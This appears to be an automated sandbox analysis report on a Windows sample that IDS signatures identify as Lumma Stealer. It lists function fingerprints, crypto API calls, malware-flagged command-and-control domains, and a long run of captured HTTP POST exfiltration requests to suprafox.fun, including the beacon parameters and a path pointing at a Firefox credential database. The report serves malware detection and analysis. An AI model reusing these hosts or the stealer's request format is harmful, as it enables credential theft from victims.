Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$_malloc_rand
String ID:
API String ID: 119520971-0
Opcode ID: 25569da2ac0c24594f12fac084b183b34e85284e74dfbb4507aaaf8b02739179
Instruction ID: e10c0ee1ba360a09002bf331d2e08047cbccc15427d62573aa14ba260d037e81
Opcode Fuzzy Hash: 25569da2ac0c24594f12fac084b183b34e85284e74dfbb4507aaaf8b02739179
Instruction Fuzzy Hash: 3521F272904609AFDB10CF54CC44FAFB7BCFF84254F114629E9169B640EB70EA01CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6D077680 Relevance: 5.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,400BD10B), ref: 6D0776AD
LeaveCriticalSection.KERNEL32(?,?,?,400BD10B), ref: 6D0776FF
EnterCriticalSection.KERNEL32(400BD10B,?,?,?,400BD10B), ref: 6D07770D
LeaveCriticalSection.KERNEL32(400BD10B,?,00000000,?,?,?,?,400BD10B), ref: 6D07772A

Part of subcall function 6D0C9BB5: _malloc.LIBCMT ref: 6D0C9BCF

Part of subcall function 6D076D40: _rand.LIBCMT ref: 6D076DEA

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$_malloc_rand
String ID:
API String ID: 119520971-0
Opcode ID: 281eae77da152c06c6c7095bedc979fd709d0bfa44717a84973ab32416ba23c6
Instruction ID: c1baa3f1682788df37ccdef698369df6bc9f225f0f6b00970656e7bb731e17d7
Opcode Fuzzy Hash: 281eae77da152c06c6c7095bedc979fd709d0bfa44717a84973ab32416ba23c6
Instruction Fuzzy Hash: FA21C272904609AFDB10DF54CC44FAFB7BCFF85654F014629E9169B640EB70EA05CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6D079580 Relevance: 5.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?), ref: 6D0795A9
LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 6D0795CA
EnterCriticalSection.KERNEL32(00000000,?,?), ref: 6D0795DA
LeaveCriticalSection.KERNEL32(00000000,?,?,?), ref: 6D0795FB

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: b7fa32e19f477dd06278b72c28093046db10a9ebec7a0d0c20ec036d36c547df
Instruction ID: a108c160a605a23a0f5a22b92ffab3d69002acdbdfb9c0816d1443301fb05ca7
Opcode Fuzzy Hash: b7fa32e19f477dd06278b72c28093046db10a9ebec7a0d0c20ec036d36c547df
Instruction Fuzzy Hash: E8117C7290411DEFDB10CF99E880EEEF7B9FF95610B0141AAE5159B610E730EA61CBA4

Uniqueness

Uniqueness Score: -1.00%

Source: http://suprafox.fun/E	Avira URL Cloud: Label: malware
Source: http://suprafox.fun/x	Avira URL Cloud: Label: malware
Source: http://suprafox.fun/ec	Avira URL Cloud: Label: malware
Source: http://suprafox.fun/ia	Avira URL Cloud: Label: malware
Source: http://suprafox.fun/bh1	Avira URL Cloud: Label: malware
Source: http://suprafox.fun/Q	Avira URL Cloud: Label: malware
Source: http://suprafox.fun:80/apiFirefox/fqs92o4p.default-release/key4.db	Avira URL Cloud: Label: malware
Source: http://suprafox.fun/api	Avira URL Cloud: Label: malware
Source: http://suprafox.fun/r	Avira URL Cloud: Label: malware
Source: http://suprafox.fun/apiQ	Avira URL Cloud: Label: malware
Source: http://suprafox.fun:80/apitxt	Avira URL Cloud: Label: malware
Source: http://suprafox.fun/api7gQA	Avira URL Cloud: Label: malware
Source: http://suprafox.fun/m	Avira URL Cloud: Label: malware
Source: http://suprafox.fun:80/apiL	Avira URL Cloud: Label: malware
Source: http://suprafox.fun/ipA	Avira URL Cloud: Label: malware
Source: http://suprafox.fun/apih	Avira URL Cloud: Label: malware
Source: http://suprafox.fun/	Avira URL Cloud: Label: malware
Source: http://suprafox.fun:80/apixt	Avira URL Cloud: Label: malware
Source: http://suprafox.fun:80/apietting_ai_detect=deleted;	Avira URL Cloud: Label: malware
Source: http://suprafox.fun:80/api	Avira URL Cloud: Label: malware
Source: dannyleagy.fun	Avira URL Cloud: Label: malware
Source: http://suprafox.fun:80/apireServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentic	Avira URL Cloud: Label: malware
Source: http://suprafox.fun/pi	Avira URL Cloud: Label: malware
Source: http://suprafox.fun/apiiF	Avira URL Cloud: Label: malware
Source: http://suprafox.fun/9	Avira URL Cloud: Label: malware

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0BDD20 CryptReleaseContext,	0_2_6D0BDD20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0BDE00 CryptGenRandom,__CxxThrowException@8,	0_2_6D0BDE00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0BDEE0 CryptReleaseContext,	0_2_6D0BDEE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0BD9D0 CryptAcquireContextA,GetLastError,	0_2_6D0BD9D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0BDBB0 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,	0_2_6D0BDBB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0E35E0 CryptReleaseContext,	0_2_6D0E35E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0BD7D4 CryptReleaseContext,	0_2_6D0BD7D4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0BD7F0 CryptReleaseContext,	0_2_6D0BD7F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_004402E0 _strlen,CryptStringToBinaryA,CryptStringToBinaryA,	1_2_004402E0

Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 40000003h	0_2_0325B760
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 40000003h	0_2_0325B870
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_0325A37F
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 40000003h	0_2_0325B758
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 40000003h	0_2_0325BA88
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 40000003h	0_2_0325BA90
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 40000003h	0_2_0325B978
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 40000003h	0_2_0325B980
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 40000003h	0_2_0325B869
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_03253ECC

Source: Traffic	Snort IDS: 2048093 ET TROJAN [ANY.RUN] Win32/Lumma Stealer Check-In 192.168.2.4:49739 -> 104.21.92.91:80
Source: Traffic	Snort IDS: 2048094 ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration 192.168.2.4:49738 -> 104.21.92.91:80
Source: Traffic	Snort IDS: 2048094 ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration 192.168.2.4:49769 -> 104.21.92.91:80

Source: Malware configuration extractor	URLs: dannyleagy.fun
Source: Malware configuration extractor	URLs: suprafo.fun

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 8Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Host: suprafox.funContent-Length: 55Cache-Control: no-cacheData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 6c 69 64 3d 54 52 4e 47 56 61 2d 2d 73 74 72 65 61 6d 26 6a 3d 64 65 66 61 75 6c 74 26 76 65 72 3d 34 2e 30 Data Ascii: act=recive_message&lid=TRNGVa--stream&j=default&ver=4.0
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 24178Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 11760Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 20468Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 535Host: suprafox.fun
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 595639Host: suprafox.fun

Source: AppLaunch.exe, 00000001.00000002.2143398584.00000000077C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: AppLaunch.exe, 00000001.00000002.2143398584.00000000077C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: AppLaunch.exe, 00000001.00000002.2143398584.00000000077C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
